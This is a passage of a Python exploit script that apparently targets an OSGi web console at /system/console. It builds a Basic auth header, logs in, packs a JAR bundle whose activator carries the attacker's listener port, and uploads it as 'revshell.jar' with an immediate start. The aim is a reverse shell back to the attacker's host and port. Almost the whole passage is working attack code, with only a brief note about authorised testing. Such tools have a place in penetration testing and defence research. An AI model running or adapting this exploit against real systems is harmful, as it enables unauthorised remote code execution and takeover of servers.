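    activator = activator.replace(activator_class_lport_tag, lport_bytes)

    manifest = subest_content
    # JAR manifests must end with a newline, otherwise the last header
    # (Bundle-Activator here) can be dropped by the parser.
    if not manifest.endswith('\n'):
        manifest += '\n'

    jar_bytes = io.BytesIO()
    with zipfile.ZipFile(jar_bytes, 'w', zipfile.ZIP_DEFLATED) as jar:
        # Manifest first, as JAR tooling conventionally expects; the entry
        # names are case-sensitive for the framework.
        jar.writestr('META-INF/MANIFEST.MF', manifest)
        jar.writestr(_activator_entry_name(manifest), activator)
    return jar_bytes.getvalue()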
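def deploy_payload(target, basic_auth, jsessionid, payload):
    """Upload and start the bundle through the console's bundle page.

    Posts a multipart form to ``<target>/bundles`` (action ``install``,
    start immediately at start level 80), authenticated with both the
    session cookie and the ``Authorization`` header.

    Args:
        target: console base URL.
        basic_auth: ``Authorization`` header value.
        jsessionid: session id from authenticate().
        payload: JAR bytes from generate_payload().

    Returns:
        True when the console answers with a redirect (302), which is how
        it acknowledges the install; False otherwise.  A 302 only shows the
        upload was accepted — the reverse shell itself is confirmed by the
        listener on lhost:lport.

    Raises:
        requests.RequestException: on connection errors or the 10 s timeout.
    """
    url = f'{target}/bundles'
    cookies = {'JSESSIONID': jsessionid}
    headers = {'Authorization': basic_auth}
    files = {
        'bundlefile': ('revshell.jar', payload, 'application/x-java-archive'),
    }
    data = {
        'action': 'install',
        'bundlestart': 'start',
        'bundlestartlevel': 80,
    }
    response = requests.post(url, headers=headers, cookies=cookies,
                             files=files, data=data, timeout=10,
                             allow_redirects=False)
    return response.status_code == 302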
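def generate_basic_auth(creds):
    """Build the ``Authorization`` header value for HTTP Basic auth.

    Args:
        creds: ``username:password`` as given on the command line.

    Returns:
        ``'Basic <base64(creds)>'``.

    Raises:
        ValueError: if ``creds`` lacks the ``:`` separator; sending it
            anyway would only surface as an unexplained login failure.
    """
    if ':' not in creds:
        raise ValueError("credentials must be in the form 'username:password'")
    encoded = base64.b64encode(creds.encode('utf-8')).decode('ascii')
    return f'Basic {encoded}'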
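def create_target_url(rhost, rport):
    """Build the web console base URL.

    Args:
        rhost: remote host name or IP.  A bare IPv6 literal is wrapped in
            brackets so the URL stays valid.
        rport: remote port.

    Returns:
        ``http://<rhost>:<rport>/system/console``.  Plain HTTP is what this
        tool targets; a console served over TLS would need ``https`` here.
    """
    host = str(rhost)
    if ':' in host and not host.startswith('['):
        host = f'[{host}]'
    return f'http://{host}:{rport}/system/console'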
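def main(args):
    """Run the exploit end to end: log in, build the bundle, deploy it.

    Only use against systems you are authorised to test.

    Args:
        args: parsed command-line Namespace from parse().

    Returns:
        Exit status: 0 on success, 1 on any failure, so a shell can tell the
        outcome apart (the original only printed).  Network errors from
        requests propagate as exceptions.
    """
    target = create_target_url(args.rhost, args.rport)
    print('[*] Logging in...')
    basic_auth = generate_basic_auth(args.creds)
    jsessionid = authenticate(target, basic_auth)
    if not jsessionid:
        print('[-] Login failed!')
        return 1
    print('[+] Session established.')
    print('[*] Generating payload...')
    payload = generate_payload(args.lhost, args.lport)
    if not payload:
        print('[-] Unable to generate payload!')
        return 1
    print('[*] Deploying payload...')
    if not deploy_payload(target, basic_auth, jsessionid, payload):
        print('[-] Unable to deploy payload!')
        return 1
    print(f'[+] Done. Check your listener on {args.lhost}:{args.lport}.')
    return 0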
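if __name__ == '__main__':
    # Propagate main()'s status to the shell (a None return exits 0).
    raise SystemExit(main(parse()))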